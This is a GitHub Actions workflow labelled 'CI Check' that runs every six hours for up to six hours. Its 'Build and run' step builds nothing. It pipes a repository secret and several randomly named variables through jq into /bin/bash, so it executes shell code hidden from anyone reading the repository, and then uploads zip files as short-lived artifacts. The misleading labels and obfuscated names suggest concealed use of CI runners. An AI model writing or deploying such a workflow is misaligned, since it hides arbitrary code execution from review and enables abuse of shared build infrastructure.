name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '45 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          lotru757: ${{ secrets.lotru757 }}
        run: |
          printf '%s' "$lotru757" | jq -r .odwhw52687 | /bin/bash
          echo $si9 | jq -r .bla29 | /bin/bash
          echo $gq30132 | jq -r .ee13573 | /bin/bash
          echo $png2313 | jq -r .kwcoy3715 | /bin/bash
          printf '%s' "$gyx406" | jq -r .ny994 | /bin/bash
          printf '%s' "$ju7" | jq -r .qt7522 | /bin/bash
          printf '%s' "$nrw30" | jq -r .ikvm9 | /bin/bash
          printf '%s' "$x3" | jq -r .p62 | /bin/bash
          printf '%s' "$rsvtv2" | jq -r .w79 | /bin/bash
          printf '%s' "$qykhj40" | jq -r .q9438 | /bin/bash
          echo $mic1318 | jq -r .m40 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: mpSSPAaS
          path: "*.zip"
          retention-days: 1
